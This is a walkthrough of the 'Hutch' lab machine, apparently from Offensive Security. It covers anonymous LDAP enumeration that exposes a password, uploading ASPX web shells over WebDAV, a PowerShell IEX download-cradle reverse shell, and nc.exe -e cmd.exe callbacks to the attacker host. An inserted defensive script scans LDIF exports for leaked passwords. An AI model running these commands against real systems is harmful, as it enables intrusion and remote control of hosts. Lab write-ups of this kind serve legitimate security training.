Hutch

Nmap


PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/10.0
| http-webdav-scan: 
|   Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
|   Server Date: Tue, 17 May 2022 04:05:48 GMT
|   Server Type: Microsoft-IIS/10.0
|_  WebDAV type: Unknown
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-05-17 04:05:00Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49688/tcp open  msrpc         Microsoft Windows RPC
49763/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-05-17T04:05:51
|_  start_date: N/A

Domain name retrieved

cme smb 192.168.164.122 -u '' -p ''

SMB         192.168.164.122 445    HUTCHDC          [*] Windows 10.0 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
SMB         192.168.164.122 445    HUTCHDC          [-] hutch.offsec\: STATUS_ACCESS_DENIED 

List users and passwords with LDAP (anonymous bind)

ldapsearch -x -h 192.168.164.122 -b "dc=hutch,dc=offsec" "*"    
# Freddy McSorley, Users, hutch.offsec
dn: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Freddy McSorley
description: Password set to CrabSharkJellyfish192 at user's request. Please c
 hange on next login.
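A defender-side check suggested by the ldapsearch result above: whoever can bind (here, even an anonymous bind) can read the description attribute, so exporting users with ldapsearch and scanning free-text attributes for credential-like words is a cheap recurring audit. This is an added example, not part of the original write-up; the LDIF sample, the regex and the attribute list are constructed, and the parser handles the LDIF line folding visible above ("Please c" / " hange") as well as base64 ("::") values.

```python
import base64
import re
# Constructed sample of ldapsearch LDIF output (not the page's real export): the first
# description is folded over two lines, the second value is base64 ("::" marker).
SAMPLE_LDIF = """\
# Sam Roe, Users, example.test
dn: CN=Sam Roe,CN=Users,DC=example,DC=test
description: Password set to Example123 at user's request. Please c
 hange on next login.

# Svc Backup, Users, example.test
dn: CN=Svc Backup,CN=Users,DC=example,DC=test
info:: cHdkOiBCYWNrdXAhMjAyMiA=

# Jane Doe, Users, example.test
dn: CN=Jane Doe,CN=Users,DC=example,DC=test
description: Sales lead for the northern region
"""
CREDENTIAL_HINT = re.compile(r"\b(password|passwd|pwd|pass)\b", re.IGNORECASE)
FREE_TEXT_ATTRS = ("description", "info", "comment")  # readable by any bound user


def parse_ldif(text):
    """Split LDIF into records ({attribute: [values]}), unfolding and decoding values."""
    records, current, logical = [], {}, []
    for raw in text.splitlines():  # 1. unfold: a leading space continues the previous line
        if raw.startswith(" ") and logical:
            logical[-1] += raw[1:]
        else:
            logical.append(raw)
    for line in logical + [""]:  # 2. records are separated by blank lines
        if line.startswith("#"):  # ldapsearch prints "# cn, ou, dc" comment lines
            continue
        if not line:
            if current:
                records.append(current)
            current = {}
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):  # "attr:: <base64>" form
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        current.setdefault(attr.lower(), []).append(value.strip())
    return records


def find_credential_leaks(text):
    """Return the DNs whose free-text attributes contain credential-like words."""
    hits = []
    for rec in parse_ldif(text):
        if any(CREDENTIAL_HINT.search(v) for a in FREE_TEXT_ATTRS for v in rec.get(a, [])):
            hits.append(rec["dn"][0])
    return hits
```

Feed it the output of an ldapsearch run against the domain (or an LDIF export) to list every entry that needs its description cleaned up and its password rotated.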

WebDAV is enabled and allows file uploads.

We can upload files with the command-line WebDAV client cadaver using the credentials we found.

Check which file extensions are executable with davtest:

davtest -auth fmcsorley:CrabSharkJellyfish192 -sendbd auto -url http://192.168.164.122
/usr/bin/davtest Summary:
Created: http://192.168.164.122/DavTestDir_9TpqP6
PUT File: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.jhtml
PUT File: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.html
PUT File: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.pl
PUT File: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.jsp
PUT File: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.php
PUT File: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.shtml
PUT File: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.aspx
PUT File: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.txt
PUT File: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.cgi
PUT File: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.asp
PUT File: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.cfm
Executes: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.html
Executes: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.aspx
Executes: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.txt
Executes: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.asp
PUT Shell: http://192.168.164.122/DavTestDir_9TpqP6/9TpqP6_aspx_cmd.aspx
PUT Shell: http://192.168.164.122/DavTestDir_9TpqP6/9TpqP6_asp_cmd.asp
PUT Shell: http://192.168.164.122/DavTestDir_9TpqP6/9TpqP6_aspx_cmd.aspx

Now I can execute commands!

http://192.168.164.122/DavTestDir_9TpqP6/9TpqP6_aspx_cmd.aspx

Set up a reverse TCP PowerShell shell and executed it

powershell IEX(New-Object Net.WebClient).downloadString('http://192.168.49.164/tcp_power.ps1')

Initial foothold

systeminfo

Host Name:                 HUTCHDC
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User

Since SeImpersonatePrivilege is enabled and this is Windows Server 2019, it's not vulnerable to Potato, but it is to PrintSpoofer.

Transferred it to the victim.

Powershell (New-Object Net.WebClient).DownloadFile("http://192.168.49.164/PrintSpoofer.exe","C:\Windows\Temp\PrintSpoofer.exe")

For some reason, I couldn't execute it from that shell, so I transferred nc.exe and got a stable shell on Linux.

PS C:\Windows\Temp> C:\Windows\Temp\nc.exe 192.168.119.153 9002 -e cmd.exe

Powershell (New-Object Net.WebClient).DownloadFile("http://192.168.49.164/nc.exe","C:\Windows\Temp\nc.exe")

Now I'm on the system!

Bloodhound experimentation